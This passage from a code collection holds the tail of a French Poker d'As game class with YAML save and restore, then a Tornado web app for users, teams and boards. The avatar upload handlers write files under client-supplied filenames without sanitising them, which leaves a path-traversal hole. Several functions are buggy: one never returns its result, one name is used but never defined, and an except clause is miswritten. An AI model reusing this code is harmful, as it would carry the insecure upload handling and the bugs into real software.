Joueur\nfrom combinaison import Combinaison\nfrom random import shuffle\n\n\nclass Partie:\n \"\"\"Represents a game of Poker d'As.\n Attributes:\n joueurs (list): The list of players.\n \"\"\"\n\n def __init__(self, joueurs, interface):\n \"\"\"Initializes a game with the list of players.\n Args:\n joueurs (list): The list of players.\n \"\"\"\n\n self.joueurs = joueurs\n self.interface = interface\n self.max_lancers = 3\n self.nb_tours = 0\n for joueur in joueurs:\n joueur.termine = False\n self.restore = False\n\n def restaure_partie(self):\n \"\"\"\n Restores a game that has already been played.\n :return: nothing\n \"\"\"\n for i in range(0, len(self.ordre)):\n index = self.ordre[i]\n joueur = self.joueurs[index]\n self.update_interface_joueur(index,joueur)\n if joueur.termine == True:\n pass\n\n def update_interface_joueur(self,index,joueur):\n \"\"\"\n Updates the player's interface panel.\n :param index: the position in the array\n :param joueur: the active player\n :return: nothing\n \"\"\"\n self.interface.joueur_interface[index][0].config(text=joueur.nom)\n try:\n if joueur.est_joker == False:\n result = str(joueur.combinaison.determiner_type_combinaison_sans_joker())\n else:\n result = str(joueur.combinaison.determiner_type_combinaison())\n cbn =\"\"\n for i in joueur.combinaison.retourne_combinaison():\n cbn += i + \" \"\n try:\n pourcent = joueur.nb_victoires * 100 / joueur.nb_parties_jouees\n label = \"combinaison: \" + cbn + \"\\nresultat: \" + result + \"\\nnombre de parti 
gagnee: \" + str(joueur.nb_victoires) +\"\\nparti jouer: \" + str(joueur.nb_parties_jouees)+\"\\npourcentage: \" + str(round(pourcent,2)) + \" %\"\n except:\n label = \"combinaison: \" + cbn + \"\\nresultat: \" + result + \"\\nnombre de parti gagnee: \" + str(joueur.nb_victoires) + \"\\nparti jouer: \" + str(joueur.nb_parties_jouees)\n except AttributeError or IndexError:\n try:\n pourcent = joueur.nb_victoires * 100 / joueur.nb_parties_jouees\n label = \"combinaison: \\nresultat: \\nnombre de parti gagnee: \" + str(joueur.nb_victoires) +\"\\nparti jouer: \" + str(joueur.nb_parties_jouees)+\"\\npourcentage: \" + str(round(pourcent,2)) + \" %\"\n except:\n label = \"combinaison: \\nresultat: \\nnombre de parti gagnee: \" + str(joueur.nb_victoires) +\"\\nparti jouer: \" + str(joueur.nb_parties_jouees)\n\n self.interface.joueur_interface[index][1].config(text=label)\n\n def jouer_partie(self):\n \"\"\" Joue une partie entre tous les joueurs et détermine le gagnant.\n Le compteur du nombre de parties est incrémenté pour chacun des joueurs.\n Le compteur de victoires est incrémenté pour le joueur gagnant (si la partie n'est pas nulle).\n Le joueur gagnant est affiché à l'écran (ou un message indiquant que la partie est nulle, s'il y a lieu).\n \"\"\"\n if self.restore == False:\n self.ordre = self._determiner_ordre()\n\n for i in range(0, len(self.ordre)):\n index = self.ordre[i]\n\n self.joueur_actif = self.joueurs[self.ordre[i]]\n if self.restore == False:\n try:\n self.joueur_actif.combinaison = 1\n except AttributeError:\n pass\n self.update_interface_joueur(index, self.joueur_actif)\n\n self.max_lancers = 3\n resultats = []\n\n for i in range(0, len(self.ordre)):\n self.interface.sauvegarde.config(state=\"normal\")\n index = self.ordre[i]\n\n self.joueur_actif = self.joueurs[index]\n try:\n if type(self.joueur_actif.combinaison.des) != list:\n pass\n except AttributeError:\n self.joueur_actif.nb_parties_jouees += 1\n\n self.interface.tour_a.config(text=\"C'est au tour de {}\\n\".format(self.joueur_actif))\n self.update_interface_joueur(index, self.joueur_actif)\n\n\n resultat, self.nb_tours = self.joueur_actif.jouer_tour(self.max_lancers)\n if i == 0:\n self.max_lancers = self.nb_tours\n\n self.update_interface_joueur(index, self.joueur_actif)\n\n resultats.append((self.joueur_actif, resultat))\n\n meilleur_joueur, _ = Combinaison.determiner_meilleur_combinaison(resultats)\n if meilleur_joueur is None:\n self.interface.tour_a.config(text=\"La partie est nulle.\")\n else:\n self.interface.tour_a.config(text=\"{} a gagné\".format(meilleur_joueur))\n meilleur_joueur.nb_victoires += 1\n\n def _determiner_ordre(self):\n \"\"\"Détermine l'ordre dans lequel les joueurs vont jouer.\n Return (list): La liste des index des joueurs indiquant l'ordre.\n Exemple:\n [2, 1, 0] indique que joueur 3 joue, suivi du joueur 2, puis du\n joueur 1.\n \"\"\"\n ordre = list(range(0, len(self.joueurs)))\n shuffle(ordre)\n return ordre\n\n def sauvegarde(self):\n \"\"\"\n Sauvegarde les paramètres de la partie sous un fichier yaml.\n :return: aucun paramètre\n \"\"\"\n save = {}\n etat =0\n save[\"joueur\"] = {}\n for joueur in self.joueurs:\n save[\"joueur\"][joueur.nom] = {}\n save[\"joueur\"][joueur.nom]['emplacement'] = etat\n save[\"joueur\"][joueur.nom][\"parti_jouer\"] = joueur.nb_parties_jouees\n save[\"joueur\"][joueur.nom][\"nombre_victoire\"] = joueur.nb_victoires\n save[\"joueur\"][joueur.nom][\"est_joker\"] = joueur.est_joker\n try:\n save[\"joueur\"][joueur.nom][\"combinaison\"] = 
str(joueur.combinaison.des)\n save[\"joueur\"][joueur.nom][\"fin_tour\"] = joueur.termine\n save[\"joueur\"][joueur.nom][\"nombre de lancer\"] = joueur.combinaison.nb_lancers\n except AttributeError:\n save[\"joueur\"][joueur.nom][\"fin_tour\"] = False\n\n etat += 1\n save[\"partie\"] = {}\n save[\"partie\"][\"ordre\"] = self.ordre\n save[\"partie\"][\"limite\"] = self.max_lancers\n with open('save.yml', 'w') as yaml_file:\n yaml.dump(save, yaml_file, default_flow_style=False)\n #print(yaml.dump(save, default_flow_style=False ))\n\n def restaure(self):\n \"\"\"\n Restores the saved yaml file and loads its parameters into the game.\n :return: nothing\n \"\"\"\n with open(\"save.yml\", 'r') as ymlfile:\n cfg = yaml.safe_load(ymlfile)\n joueurs_restaure = []\n for joueur in cfg['joueur']:\n joueurs_restaure.append(joueur)\n\n for joueur in cfg['joueur']:\n\n joueurs_restaure[cfg['joueur'][joueur]['emplacement']] = Joueur(joueur,self.interface,cfg['joueur'][joueur]['est_joker'])\n joueurs_restaure[cfg['joueur'][joueur]['emplacement']].nb_parties_jouees = cfg['joueur'][joueur]['parti_jouer']\n joueurs_restaure[cfg['joueur'][joueur]['emplacement']].nb_victoires = cfg['joueur'][joueur]['nombre_victoire']\n joueurs_restaure[cfg['joueur'][joueur]['emplacement']].termine = cfg['joueur'][joueur]['fin_tour']\n\n try:\n joueurs_restaure[cfg['joueur'][joueur]['emplacement']].restaure_combinaison(cfg['joueur'][joueur]['combinaison'])\n joueurs_restaure[cfg['joueur'][joueur]['emplacement']].combinaison.nb_lancers = cfg['joueur'][joueur]['nombre de lancer']\n except KeyError:\n joueurs_restaure[cfg['joueur'][joueur]['emplacement']].nb_lancers = 0\n self.ordre = cfg[\"partie\"][\"ordre\"]\n self.max_lancers = cfg[\"partie\"][\"limite\"]\n self.joueurs = joueurs_restaure\n self.interface.list_obj_joueur = self.joueurs\n\n\nif __name__ == \"__main__\":\n joueurs = [Joueur(\"a\"), Joueur(\"b\"), Joueur(\"c\")]\n\n partie = Partie(joueurs, None)\n\n # Check that every player plays once and only once\n ordre = partie._determiner_ordre()\n assert len(ordre) == 3\n assert 0 in ordre\n assert 1 in ordre\n assert 2 in ordre\n\n partie.restaure()\n","sub_path":"partie.py","file_name":"partie.py","file_ext":"py","file_size_in_byte":8490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"548307739","text":"import tornado.web\nimport tornado.auth\nimport tornado.locks\nimport tornado.escape\nimport tornado.ioloop\nimport tornado\nimport datetime\nimport random\nimport pytz\nimport json\nimport os\n\nfrom abc import ABC\nfrom decouple import config\nfrom tornado.options import options, define\n\nfrom token_n import generate_confirmation_token, confirm_token\nfrom EmailSender import send_email\nfrom data import db_session\nfrom data.User import User, Notification\nfrom data.Team import Team\nfrom data.Boards import Boards, Message\nfrom data.Threads import Threads\nfrom data.User_events import UserEvents\nfrom data.Team_events import TeamEvents\n\nfrom forms.User import LoginForm, RegisterForm\nfrom forms.Team import TeamRegisterForm\nfrom forms.Boards import FormBoardsCreate\n\nfrom sqlalchemy.ext.declarative import DeclarativeMeta\n\n\nclass AlchemyEncoder(json.JSONEncoder):\n\tdef default(self, obj):\n\t\tif isinstance(obj.__class__, DeclarativeMeta):\n\t\t\t# an SQLAlchemy class\n\t\t\tfields = {}\n\t\t\tfor field in [x for x in dir(obj) if not x.startswith('_') and x != 'metadata']:\n\t\t\t\tdata = 
obj.__getattribute__(field)\n\t\t\t\ttry:\n\t\t\t\t\tjson.dumps(data) # this will fail on non-encodable values, like other classes\n\t\t\t\t\tfields[field] = data\n\t\t\t\texcept TypeError:\n\t\t\t\t\tfields[field] = None\n\t\t\t# a json-encodable dict\n\t\t\treturn fields\n\t\treturn json.JSONEncoder.default(self, obj)\n\n\ndefine(\"port\", default=int(os.environ.get(\"PORT\", 5000)), help=\"run on the given port\", type=int)\nCACHE_SIZE = 50 # Maximum number of messages on the board\n\n\nasync def append_to_team(user_invited: User, team: Team) -> None:\n\ttoken = generate_confirmation_token(user_invited.email)\n\tdb_sess = db_session.create_session()\n\tuser = db_sess.query(User).filter(team.chief == User.id).first()\n\tntf = Notification(\n\t\tname=f\"Invitation to join the team   {team.title}\",\n\t\tpayload_json=json.dumps(\"\"),\n\t\ttimestamp=str(datetime.datetime.now(pytz.timezone('Europe/Moscow')))\n\t)\n\tntf.payload_json = json.dumps(\n\t\tf\"Warm sun over your head, Sumer {user_invited.username}!\\n\" + f\"You were invited by {user.username} to the {team.title} team. \" + f\"If you want to accept the invitation, then follow this link\")\n\tuser_invited.notifications.append(ntf)\n\tdb_sess.commit()\n\n\nasync def join_to_board(user_asked: User, board: Boards):\n\tdb_sess = db_session.create_session()\n\tuser_admin = db_sess.query(User).filter(board.admin == User.id).first()\n\ttoken = generate_confirmation_token(user_admin.email)\n\tntf = Notification(\n\t\tname=f\"Request to join the board   {board.title}\",\n\t\tpayload_json=json.dumps(\"\"),\n\t\ttimestamp=str(datetime.datetime.now(pytz.timezone('Europe/Moscow')))\n\t)\n\tntf.payload_json = json.dumps(\n\t\tf\"Warm sun over your head, Sumer {user_admin.username}!\\n\" + f\"You are asked by {user_asked.username} to add his (her) to your board {board.title}. 
\" + f\"If you want to do this, then follow this link\")\n\tuser_admin.notifications.append(ntf)\n\tdb_sess.commit()\n\n\nasync def notify_join_team(user_invited: User, team: Team) -> None:\n\tdb_sess = db_session.create_session()\n\tuser = db_sess.query(User).filter(team.chief == User.id).first()\n\tntf = Notification(\n\t\tname=f\"Notification of joining the team   {team.title}\",\n\t\tpayload_json=json.dumps(\"\"),\n\t\ttimestamp=str(datetime.datetime.now(pytz.timezone('Europe/Moscow')))\n\t)\n\tntf.payload_json = json.dumps(\n\t\tf\"Warm sun over your head, Sumer {user.username}!\\n\" + f\"User {user_invited.username} has just accepted your application to join the team!\\n\" + \"Congratulations!\")\n\tuser.notifications.append(ntf)\n\tdb_sess.commit()\n\n\nasync def notify_join_board(user_asked: User, board: Boards):\n\tdb_sess = db_session.create_session()\n\tntf = Notification(\n\t\tname=f\"Request to join the board   {board.title}\",\n\t\tpayload_json=json.dumps(\"\"),\n\t\ttimestamp=str(datetime.datetime.now(pytz.timezone('Europe/Moscow')))\n\t)\n\tntf.payload_json = json.dumps(\n\t\tf\"Warm sun over your head, Sumer {user_asked.username}!\\nYour request to join the board {board.title} has been accepted!\\nCongratulations!\")\n\tuser_asked.notifications.append(ntf)\n\tdb_sess.commit()\n\n\nclass Application(tornado.web.Application):\n\tdef __init__(self, db=None):\n\t\tself.db = db\n\t\thandlers = [\n\t\t\t# Home page\n\t\t\t(r\"/\", HomeHandler),\n\t\t\t# For fun\n\t\t\t(r\"/generate_error/\\d\\d\\d\", ErrorGenerator),\n\t\t\t(r\"/chess$\", ChessHandler),\n\t\t\t(r\"/runner$\", RunnerHandler),\n\t\t\t(r\"/scrolling$\", ScrollingHandler),\n\t\t\t# Pages related to user invite\n\t\t\t(r\"/invite_team/\\S+\", InviteTeamHandler),\n\t\t\t(r\"/invite_board/\\S+\", InviteBoardHandler),\n\t\t\t# Pages related to the site policy\n\t\t\t(r\"/legal\", LegalHandler),\n\t\t\t(r\"/legal/cookie-policy\", LegalCookiePolicyHandler),\n\t\t\t# Pages related to user authorization\n\t\t\t(r\"/auth/create\", AuthCreateHandler),\n\t\t\t(r\"/auth/login\", AuthLoginHandler),\n\t\t\t(r\"/auth/logout\", AuthLogoutHandler),\n\t\t\t(r\"/auth/confirm\", AuthConfirmHandler),\n\t\t\t(r\"/auth/confirm/\\S+\", AuthCheckConfirmHandler),\n\t\t\t# Pages related to teams\n\t\t\t(r\"/teams\", TeamsHandler),\n\t\t\t(r\"/team/\\S+/edit$\", TeamEditHandler),\n\t\t\t(r\"/team/\\S+/leave$\", TeamLeaveHandler),\n\t\t\t# Pages related to boards\n\t\t\t(r\"/boards\", BoardsHandler),\n\t\t\t(r\"/board/\\S+/view$\", BoardViewHandler),\n\t\t\t(r\"/board/\\S+/edit$\", BoardEditHandler),\n\t\t\t(r\"/board/\\S+/leave$\", BoardLeaveHandler),\n\t\t\t(r\"/board/\\S+/delete$\", BoardDeleteHandler),\n\t\t\t(r\"/board/\\S+/user_event/new\", UserEventCreateHandler),\n\t\t\t(r\"/board/\\S+/team_event/new\", TeamEventCreateHandler),\n\t\t\t(r\"/board/\\S+/user_event/\\d+$\", UserEventHandler),\n\t\t\t(r\"/board/\\S+/team_event/\\d+$\", TeamEventHandler),\n\t\t\t(r\"/board/\\S+/user_event/edit/\\d+$\", UserEventEditHandler),\n\t\t\t(r\"/board/\\S+/team_event/edit/\\d+$\", TeamEventEditHandler),\n\t\t\t(r\"/board/\\S+/user_event/view/\\d+$\", UserEventAnswersView),\n\t\t\t(r\"/board/\\S+/team_event/view/\\d+$\", TeamEventAnswersView),\n\t\t\t(r\"/board/\\S+/flood$\", BoardFloodHandler),\n\t\t\t(r\"/board/\\S+/flood/new$\", MessageNewHandler),\n\t\t\t# Pages related to personal account (personal teams, boards, notifications, etc)\n\t\t\t(r\"/\\S+/inbox$\", UserInBoxHandler),\n\t\t\t(r\"/\\S+/inbox/check$\", 
UserInBoxCheckHandler),\n\t\t\t(r\"/\\S+/inbox/delete$\", UserInBoxDeleteHandler),\n\t\t\t(r\"/\\S+/teams$\", UserTeamsHandler),\n\t\t\t(r\"/\\S+/boards$\", UserBoardsHandler),\n\t\t\t(r\"/\\S+/create_team$\", CreateTeamHandler),\n\t\t\t(r\"/\\S+/create_board$\", CreateBoardHandler),\n\t\t\t(r\"/\\S+\", UserAccountHandler),\n\t\t]\n\t\tsettings = dict(\n\t\t\ttitle_=u\"Nabopalasar II\",\n\t\t\ttemplate_path=os.path.join(os.path.dirname(__file__), \"templates\"),\n\t\t\tstatic_path=os.path.join(os.path.dirname(__file__), \"static\"),\n\t\t\t# ui_modules={\"Paginator\": PaginationHandler},\n\t\t\txsrf_cookies=True,\n\t\t\tcookie_secret=config(\"SECRET_KEY\"),\n\t\t\tlogin_url=\"/auth/login\",\n\t\t\tdebug=True,\n\t\t)\n\t\tsuper().__init__(handlers, **settings)\n\n\nclass BaseHandler(tornado.web.RequestHandler, ABC):\n\tasync def prepare(self):\n\t\tdb_sess = db_session.create_session()\n\t\tuser_email = tornado.escape.native_str(self.get_secure_cookie(\"user\"))\n\t\tif user_email:\n\t\t\tself.current_user = db_sess.query(User).filter(User.email == user_email).first()\n\n\t# Else cookies don't establish\n\n\tdef write_error(self, status_code: int, **kwargs):\n\t\tif status_code == 404:\n\t\t\tself.render(\"error404.html\")\n\t\telif status_code == 500:\n\t\t\tself.render(\"error500.html\")\n\t\telse:\n\t\t\tself.render(\"error_general.html\", status_code=status_code)\n\n\tdef check_match_user(self, user_: User) -> bool:\n\t\treturn True if self.current_user.id == user_.id else False\n\n\t@staticmethod\n\tdef get_user(username_: str, db_sess_) -> User:\n\t\treturn db_sess_.query(User).filter(User.username == username_).first()\n\n\t@staticmethod\n\tdef get_board(board_name: str, db_sess_) -> Boards:\n\t\treturn db_sess_.query(Boards).filter(Boards.title == board_name).first()\n\n\t@staticmethod\n\tdef get_team(team_name: str, db_sess_) -> Team:\n\t\treturn db_sess_.query(Team).filter(Team.title == team_name).first()\n\n\t@staticmethod\n\tdef get_team_event(event_id: str, db_sess_) -> TeamEvents:\n\t\treturn db_sess_.query(TeamEvents).filter(TeamEvents.id == int(event_id)).first()\n\n\t@staticmethod\n\tdef get_user_event(event_id: str, db_sess_) -> UserEvents:\n\t\treturn db_sess_.query(UserEvents).filter(UserEvents.id == int(event_id)).first()\n\n\t@staticmethod\n\tasync def get_dict_t(threads: list, board: Boards):\n\t\tdict_ts = {}\n\t\tfor t in threads:\n\t\t\tif t in board.board_threads:\n\t\t\t\tdict_ts[t] = True\n\t\t\telse:\n\t\t\t\tdict_ts[t] = False\n\t\treturn {key: value for key, value in sorted(dict_ts.items(), key=lambda item: item[1], reverse=True)}\n\n\nclass HomeHandler(BaseHandler, ABC):\n\t\"\"\"The home class that is primarily responsible for the navbar\"\"\"\n\n\tasync def get(self):\n\t\twith open('auto/news.json', mode='r', encoding='utf-8') as f:\n\t\t\tdata = json.load(f)\n\t\t# We don't want to not only lose, but also leave non-unique news\n\t\tawait self.render(\"base.html\", title=\"Home\", news_=data['news'])\n\n\nclass AuthLoginHandler(BaseHandler, ABC):\n\tasync def get(self):\n\t\tform = LoginForm(self.request.arguments)\n\t\tawait self.render(\"auth_login.html\", title=\"Authorization\", message=None, form=form)\n\n\tasync def post(self):\n\t\tform = LoginForm(self.request.arguments)\n\t\tif form.validate():\n\t\t\tdb_sess = db_session.create_session()\n\t\t\tuser = db_sess.query(User).filter(User.email == form.email.data).first()\n\t\t\tif user and user.check_password(form.password.data):\n\t\t\t\tself.set_secure_cookie(\"user\", 
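# the cookie value is signed with the app's cookie_secret, so it cannot be\n\t\t\t\t# forged client-side; BaseHandler.prepare() later maps it back to a User row\n\t\t\t\t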
self.get_argument(\"email\"))\n\t\t\t\tawait self.prepare()\n\t\t\t\tself.redirect(\"/\")\n\t\t\t\treturn\n\t\t\tawait self.render(\n\t\t\t\t\"auth_login.html\", title=\"Authorization error\",\n\t\t\t\tmessage=\"Incorrect username or password\", form=form\n\t\t\t)\n\t\tawait self.render(\"auth_login.html\", title=\"Authorization\", message=None, form=form)\n\n\nclass AuthCreateHandler(BaseHandler, ABC):\n\tasync def get(self):\n\t\tform = RegisterForm(self.request.arguments)\n\t\tawait self.render(\n\t\t\t\"auth_create.html\", form=form, title=\"Sign Up\", message_username=None, message_email=None,\n\t\t\tmessage_password=None, )\n\n\tdef post(self):\n\t\tform = RegisterForm(self.request.arguments)\n\t\tif form.validate():\n\t\t\tif form.password.data != form.password_again.data:\n\t\t\t\treturn self.render(\n\t\t\t\t\t\"auth_create.html\", title=\"Password Error\", form=form, message_username=None,\n\t\t\t\t\tmessage_email=None, message_password=\"Passwords do not match\")\n\t\t\tdb_sess = db_session.create_session()\n\t\t\tif db_sess.query(User).filter(User.email == form.email.data).first():\n\t\t\t\treturn self.render(\n\t\t\t\t\t\"auth_create.html\", title=\"Email Error\", form=form, message_email=f\"Email is already taken\",\n\t\t\t\t\tmessage_username=None, message_password=None)\n\t\t\tif self.get_user(form.username.data, db_sess):\n\t\t\t\treturn self.render(\n\t\t\t\t\t\"auth_create.html\", title=\"Username Error\", form=form,\n\t\t\t\t\tmessage_username=f\"Username {form.username.data} is not available\",\n\t\t\t\t\tmessage_password=None, message_email=None)\n\t\t\tuser = User(\n\t\t\t\tusername=form.username.data,\n\t\t\t\temail=form.email.data,\n\t\t\t\thashed_password=form.password_again.data,\n\t\t\t\tis_reads=False,\n\t\t\t\tis_confirmed=True # Heroku does not like my email posts (\n\t\t\t)\n\t\t\tuser.set_password(form.password.data)\n\t\t\tdb_sess.add(user)\n\t\t\tdb_sess.commit()\n\t\t\tself.set_secure_cookie(\"user\", str(form.email.data))\n\t\t\t# self.current_user = str(form.email.data)\n\t\t\t# The user immediately logs in; now you need to confirm your email address\n\t\t\t# self.redirect(\"/auth/confirm\")\n\t\t\tself.redirect(\"/\")\n\t\t\treturn\n\t\treturn self.render(\n\t\t\t\"auth_create.html\", form=form, title=\"Registration Error\", message_username=None,\n\t\t\tmessage_email=None, message_password=None)\n\n\nclass AuthLogoutHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tself.clear_cookie(\"user\")\n\t\tself.redirect(\"/\")\n\n\nclass AuthConfirmHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tif self.current_user.is_confirmed:\n\t\t\t# User already confirmed his email\n\t\t\tself.write_error(404)\n\t\ttoken = generate_confirmation_token(self.current_user.email)\n\t\ttext_msg = f\"Have a nice time of day, friend {self.current_user.username}!\\n\" \\\n\t\t f\"Babylon is so beautiful today only because you are on our website.\\n\" \\\n\t\t f\"However, to confirm your email address, you need to click on the following link:\\n\" \\\n\t\t f\"{self.request.uri}/{token}\\n\" \\\n\t\t f\"With best wishes,\\n\" \\\n\t\t f\"akkadian team Nabopalasar II\"\n\t\ttry:\n\t\t\t# if send_email(\n\t\t\t# \t\tself.current_user.email, \"Nabopalasar II: email confirmation\", text_msg,\n\t\t\t# \t\t\"../static/img/news/womans_img.jpg\"):\n\t\t\t# \tawait self.render(\"auth_confirm.html\", title=\"Confirm\", email=self.current_user.email, success=True)\n\t\t\t# \treturn\n\t\t\tpass\n\t\texcept 
Exception:\n\t\t\tawait self.render(\"auth_confirm.html\", title=\"Confirm\", email=self.current_user.email, success=False)\n\n\nclass AuthCheckConfirmHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tdef get(self):\n\t\tif self.current_user.is_confirmed:\n\t\t\t# User already confirmed his email\n\t\t\tself.write_error(404)\n\t\ttoken = self.request.uri.split(\"/\")[-1]\n\t\ttry:\n\t\t\temail = confirm_token(token)\n\t\texcept Exception:\n\t\t\tself.write_error(404)\n\t\t\treturn\n\t\tdb_sess = db_session.create_session()\n\t\tuser = db_sess.query(User).filter(User.email == email).first()\n\t\tif user.username != self.current_user.username:\n\t\t\tself.write_error(403)\n\t\t\treturn\n\t\tif user.is_confirmed:\n\t\t\tself.write_error(404)\n\t\t\treturn\n\t\tuser.is_confirmed = True\n\t\tdb_sess.add(user)\n\t\tdb_sess.commit()\n\t\tself.redirect(\"/\")\n\t\treturn\n\n\nclass UserAccountHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tusername = str(self.request.uri)[1:]\n\t\tif '/' in username:\n\t\t\t# It's another address\n\t\t\tself.write_error(404)\n\t\t\treturn\n\t\tdb_sess = db_session.create_session()\n\t\tuser = self.get_user(username, db_sess)\n\t\tif not user:\n\t\t\tself.write_error(404)\n\t\t\treturn\n\t\tteams_own = db_sess.query(Team).filter(Team.chief == self.current_user.id).all()\n\t\tboards_own = db_sess.query(Boards).filter(Boards.admin == self.current_user.id).all()\n\t\tawait self.render(\"user_view.html\", title=user.username, user=user, teams_own=teams_own, boards_own=boards_own)\n\n\t@tornado.web.authenticated\n\tdef post(self):\n\t\tdb_sess = db_session.create_session()\n\t\tuser = self.get_user(str(self.request.uri)[1:], db_sess)\n\t\tuser.name = self.get_body_argument(\"first_name\")\n\t\tuser.surname = self.get_body_argument(\"last_name\")\n\t\ttry:\n\t\t\t# If checkbox is deactivated then argument check_13 miss\n\t\t\t_ = self.get_body_argument(\"check_13\")\n\t\t\tuser.is_reads = True\n\t\texcept Exception:\n\t\t\tuser.is_reads = False\n\t\tf = self.request.files.get(\"avatar\")\n\t\tif f:\n\t\t\tfile_avatar = f[0] # We use only 1 file\n\t\t\tfilename = f\"static/img/users/{file_avatar['filename']}\"\n\t\t\twith open(filename, mode='wb') as file:\n\t\t\t\tfile.write(file_avatar['body'])\n\t\t\tuser.avatar = \"../\" + filename\n\t\tdb_sess.commit()\n\t\tself.redirect(self.request.uri)\n\t\treturn\n\n\nclass ErrorGenerator(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tdef get(self):\n\t\tself.write_error(int(self.request.uri.split('/')[-1]))\n\n\nclass TeamsHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\tteams = sorted(db_sess.query(Team).all(), key=lambda x: len(x.users), reverse=True)\n\n\t\tdef get_cap(id_cap: int):\n\t\t\treturn db_sess.query(User).filter(User.id == id_cap).first()\n\n\t\tawait self.render(\"teams.html\", title=\"Teams\", teams=teams, get_cap=get_cap)\n\n\nclass BoardsHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\tboards = sorted(db_sess.query(Boards).all(), key=lambda x: len(x.board_users), reverse=True)\n\t\tawait self.render(\"boards.html\", title=\"Boards\", boards=boards, get_admin=get_admin)\n\n\nclass UserTeamsHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tusername = str(self.request.uri).split('/')[-2]\n\t\tdb_sess = db_session.create_session()\n\t\tuser = self.get_user(username, 
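# BaseHandler.get_user returns None for an unknown username; the guard\n\t\t\t# just below turns that into a 404\n\t\t\t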
db_sess)\n\t\tif not user:\n\t\t\tself.write_error(404)\n\t\t\treturn\n\t\tif user.username != self.current_user.username:\n\t\t\t# We cannot watch teams other user\n\t\t\tself.write_error(403)\n\t\t\treturn\n\t\tteams_own = db_sess.query(Team).filter(Team.chief == self.current_user.id).all()\n\t\tteams = db_sess.query(Team).all()\n\t\tteams_in = []\n\t\tfor t in teams:\n\t\t\tfor user_ in t.users:\n\t\t\t\tif user_.username == self.current_user.username:\n\t\t\t\t\tteams_in.append(t)\n\n\t\tdef get_cap(id_cap: int):\n\t\t\treturn db_sess.query(User).filter(User.id == id_cap).first()\n\n\t\tawait self.render(\n\t\t\t\"user_teams.html\", title=\"Your teams\", own_teams=teams_own, in_teams=teams_in,\n\t\t\tget_cap=get_cap)\n\n\nclass LegalHandler(BaseHandler, ABC):\n\tasync def get(self):\n\t\tawait self.render(\"about.html\", title=\"About\")\n\n\nclass LegalCookiePolicyHandler(BaseHandler, ABC):\n\tasync def get(self):\n\t\tawait self.render(\"cookies_about.html\", title=\"Cookie Policy\")\n\n\nclass UserBoardsHandler(BaseHandler, ABC):\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tusername = str(self.request.uri).split('/')[-2]\n\t\tdb_sess = db_session.create_session()\n\t\tuser = self.get_user(username, db_sess)\n\t\tif not user:\n\t\t\tself.write_error(404)\n\t\t\treturn\n\t\tif user.username != self.current_user.username:\n\t\t\t# We cannot watch teams other user\n\t\t\tself.write_error(403)\n\t\t\treturn\n\t\tboards_own = db_sess.query(Boards).filter(Boards.admin == self.current_user.id).all()\n\t\tboards = db_sess.query(Boards).all()\n\t\tboards_in = []\n\t\tfor b in boards:\n\t\t\tfor user_ in b.board_users:\n\t\t\t\tif user_.username == self.current_user.username:\n\t\t\t\t\tboards_in.append(b)\n\t\tawait self.render(\n\t\t\t\"user_boards.html\", title=\"Your boards\", own_boards=boards_own, in_boards=boards_in,\n\t\t\tget_admin=get_admin)\n\n\nclass TeamEditHandler(BaseHandler, ABC):\n\tdef get_res_sort(self, db_sess, team: Team):\n\t\tres = db_sess.query(User).filter(User.id != self.current_user.id).all()\n\t\tkeys = []\n\t\tfor user in res:\n\t\t\tif user in team.users:\n\t\t\t\tkeys.insert(0, user)\n\t\t\telse:\n\t\t\t\tkeys.append(user)\n\t\tres_sort = {}\n\t\tfor key in keys:\n\t\t\tif key in team.users:\n\t\t\t\tres_sort[key] = 1\n\t\t\telse:\n\t\t\t\tres_sort[key] = 0\n\n\t@tornado.web.authenticated\n\tasync def get(self):\n\t\tdb_sess = db_session.create_session()\n\t\tteam = self.get_team(self.request.uri.split('/')[-2], db_sess)\n\t\tif not team:\n\t\t\tself.write_error(404)\n\t\t\treturn\n\t\tif self.current_user.id != team.chief:\n\t\t\tself.write_error(403)\n\t\t\treturn\n\n\t\tawait self.render(\"edit_team.html\", title=team.title, result=self.get_res_sort(db_sess, team), team=team)\n\n\t@tornado.web.authenticated\n\tasync def post(self):\n\t\tdb_sess = db_session.create_session()\n\t\tteam = self.get_team(self.request.uri.split('/')[-2], db_sess)\n\t\ttry:\n\t\t\ts = self.get_body_argument(\"string\")\n\t\texcept Exception:\n\t\t\t# It's team profile!\n\t\t\tf = self.request.files.get(\"f\")\n\t\t\tif f:\n\t\t\t\tfile_avatar = f[0] # We use only 1 file\n\t\t\t\tfilename = f\"static/img/teams/{file_avatar['filename']}\"\n\t\t\t\twith open(filename, mode='wb') as file:\n\t\t\t\t\tfile.write(file_avatar['body'])\n\t\t\t\tteam.avatar = \"../\" + filename\n\t\t\ttry:\n\t\t\t\tis_d = self.get_body_argument(\"DELETE_team\")\n\t\t\texcept Exception:\n\t\t\t\tis_d = None\n\t\t\tif is_d is not None:\n\t\t\t\t# bye 
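As written, the get_res_sort helper above builds its res_sort dictionary and then falls off the end without returning it, so the GET handler renders result=None; the POST handler then rebuilds the same ordering inline. A minimal standalone sketch of the intended logic, using plain strings as stand-ins for User records so it runs on its own:

# Sketch: current team members sort to the front, and each candidate maps
# to a 1/0 membership flag; the explicit return is the fix the original lacks.
def get_res_sort(candidates, team_users):
    keys = sorted(candidates, key=lambda user: user not in team_users)
    return {user: 1 if user in team_users else 0 for user in keys}

assert get_res_sort(["ann", "bob", "eve"], ["eve"]) == {"eve": 1, "ann": 0, "bob": 0}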
